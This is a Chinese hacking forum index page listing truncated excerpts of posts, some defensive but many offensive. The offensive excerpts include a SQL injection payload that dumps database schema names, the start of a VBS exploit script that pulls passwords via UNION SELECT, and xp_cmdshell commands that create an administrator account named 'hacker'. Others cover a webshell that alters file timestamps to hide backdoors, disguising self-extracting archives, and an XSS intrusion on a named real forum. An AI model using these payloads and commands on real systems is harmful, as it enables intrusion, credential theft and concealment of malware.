电脑病毒论坛 今日: 0|主题: 1421|排名: 18 

自解压文件在右键中不显示　解压到 我们创建自解压文件后就算更改图标，当你右键单击时会显示　解压文件等选项，一看就知道是自解压文件，下面说一种方法让它不显示： 　　　用C32载入搜索十六进制807A0272,把72改成ＡＡ,然后再搜索526172211A07,把72改成ＡＡ．当然，ＡＡ是我的改法，你可以换成其他的． ...

暴库名＼表名＼列名 /**/union/**/select/**/unhex(hex(concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)))+FROM+information_sch ema.columns+WHERE+table_schema!=0x696e666f726d6174696f6e5f736368656d61+LIMIT+N,1-- 碰到一个字段暴不出来，问了下trace，找到了原因，是因为用户名字段是9个 ...

以下是search.inc.php 文件漏洞利用代码VBS版 复制代码代码如下: Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then ShowU() Else strSite=Args(0) strPath=Args(1) strUid=Args(2) End If strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/f ...

JSP 修改文件时间的WEBSHELL 很多网站的管理员通过查看文件的修改时间定位被入侵后流下的网马与后门，因此修改文件的创建与修改时间可以有效的预防后门的泄露。 昨天研究了下，JSP只提供了修改“文件修改时间”的接口，却没有提供修改“文件创建时间”的接口，因此貌似只能修改“文件修改时间 &rd ...

此漏洞存在于Example\NewsSystem目录下的delete.asp文件中，这是ewebeditor的测试页面，无须登陆可以直接进入，看这些代码： ' 把带"|"的字符串转为数组 Dim aSavePathFileName aSavePathFileName = Split(sSavePathFileName, "|") ' 删除新闻相关的文件，从文件夹中 Dim i For i = 0 To UBound(aSavePathFileName) ' 按路 ...

网上关于XSS入侵网站的例子很多，但是大多都是一些恶作剧性质的介绍.下面本人来亲自介绍下利用脚本入侵国内某安全论坛的过程就像主题所说一样，今天测试的论坛是DISCUZ！ 6.1.0 目标：卡巴技术论坛 http://kpchina.net http://bbs.kpchina.net工具：无（感觉本人的入侵方式不是很高级，低调，所以不用工具，需要的东西自己 ...

Lxblog 是 PHPWind 开发的一套基于 PHP+MySQL 数据库平台架构的多用户博客系统，强调整站与用户个体间的交互，拥有强大的个人主页系统、独立的二级域名体系、灵活的用户模板系统、丰富的朋友圈和相册功 能。但是该blog系统在安全性上并不让人满意，本文就来分析lxblog一个变量未初始化造成的sql注入漏洞。 我们先来分析一下 ...

影响2.5.x和2.6.x,其他版本未测试 goods_script.php 44行: 复制代码代码如下: if (empty($_GET['type'])) { ... } elseif ($_GET['type'] == 'collection') { ... } $sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10); $res = $db->query($sql); $sql没有初始化,很明显的一个漏洞 EXP: ...

影响版本: Discuz!4.0.0 Discuz!4.1.0 Discuz!5.0.0 Discuz!5.5.0 Discuz!6.0.0 Discuz!6.1.0 描述: Discuz!论坛系统是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。Discuz! 在代码质量，运行效率，负载能力，安全等级，功能可操控性和权限严密性等方面都在广大用户中有良好的口碑 由于 PHP 对 多字节字 ...

这个是最新有人发现的 该漏洞文件：ask/search_ajax.php 漏洞说明： /ask/search_ajax.php Code: if($q) { $where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where } else { exit('null'); } $infos = $ask->listinfo($where, 'askid DESC', '', 10); /ask/include/answer.class.php Code: function lis ...

首先确保得到数据库超级管理员权限 然后执行如下SQL命令: 1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add' 2、exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add' 解释： 1.通过调用cmdshell 也就是cmd 执行DOS 命令创建hacker用户 2 授权给hacker用户超级管理员权限.. 3 这时候您就 ...

看到Sai52兄弟写出了这个内网渗透工具的使用教程,于是请教此工具优于Lcx的地方,得到答复是:只要对方的网页能访问就可用,即使目标是在路由器映射端口或者防火墙后,不需更改任何设置就可用.而Lcx并不能达到这个效果.下面转Sai52兄弟的文章.-------------------------作者：sai52[B.H.S.T]blog：www.sai52.com这个工具可以把内 ...

IE有一个特性，那就是在将一个文件展示给用户之前会首先检查文件的类型，这乍看起来并没什么问题，但实际上这是相当危险的，因为这会允许IE执行图片中的代码，即嵌入在一个图像中的JavaScript代码。引入MIME sniffing功能的初衷是用来弥补Web服务器响应一个图像请求时有可能返回错误的内容类型信息这一缺陷。 　　但是事不 ...

随着网络的飞速发展，现在最热的话题自然就是网络安全了。在信息时代里，几乎每个人都面临着安全威胁，都有必要对网络安全方面的知识有所了解，并能够处理一些安全方面的问题，那些平时不注意安全的人，往往在付出惨重的代价时才会后悔不已。下面笔者就介绍几个保护局域网中的共享资源的安全防范技巧，希望能够给大家带来帮 ...

网络管理人员应认真分析各种可能的入侵和攻击形式，制定符合实际需要的网络安全策略，防止可能从网络和系统内部或外部发起的攻击行为，重点防止那些来自具有敌意的国家、企事业单位、个人和内部恶意人员的攻击。 　　防止入侵和攻击的主要技术措施包括访问控制技术、防火墙技术、入侵检测技术、安全扫描、安全审计和安全管 ...

目前网络上的病毒、木马日益增多，更为严重的是有一些为谋取私人利益的间谍软件、广告程序都可能对我们的计算机造成危害，甚至有的软件被人利用，还可达到跟木马入侵的同样效果。因此你作为一个精明的电脑用户，除了必须了解各种恶意软件的入侵途径外，还需对其常见的入侵加以防御，才可保护电脑及财产的安全。 　　一、通 ...

黑客通过VoIP渗透来窃取、私用企业的VoIP电话，造成了VoIP的不安全性。开放性的架构所带来的灵活性让VoIP能够渗透到企业的整个管理流程中去,提高通信效能,提高生产效率,这是IP技术的核心优势所在。所有影响数据网络的攻击都可能会影响到VoIP网络,如病毒、垃圾邮件、非法侵入、DoS、劫 持电话、偷听、数据嗅探等。　　前段时 ...

Oracle 10g 中出现表名：BIN$2cMp4FjwQ2Cw3Lj+BxLYTw==$0 最近发现Oracle中出现了这些奇怪的表名，上网查找后发现是oracle10g的回收站功能，并没有彻底的删除表，而是把表放入回收站，最后就出现了这样一堆奇怪的表名。。。。 清除的方法如下： purge table origenal_tableName; purge index origenal_indexName; 查询垃圾 ...

日常使用中，IE庞大的使用人群和层出不穷的高危漏洞，使它往往很容易受到来自各方面的影响和攻击而导致失效。而由于卸载的不便和难以通过覆盖安装解决问题，因此很多朋友在面对此问题时往往选择了格式化硬盘重装系统或通过第三方备份软件进行恢复，这无疑为大家的网上生活制造了巨大的障碍和麻烦。其实很多时候IE内核并无受 ...

常在河边走，哪能不湿鞋呢？互联网上各种病毒在不停的流窜，作为连接在网络上的电脑，尽管我们已经做了各种防范，但还是不能避免，稍不留神就会中招。而现在我们学到的多是如何防范电脑中毒的知识，但是对于已经中毒的电脑如何处理却知之甚少。下面我们就向大家介绍中毒后一些紧急处理措施。 　　 一、不要重启 　　一般来 ...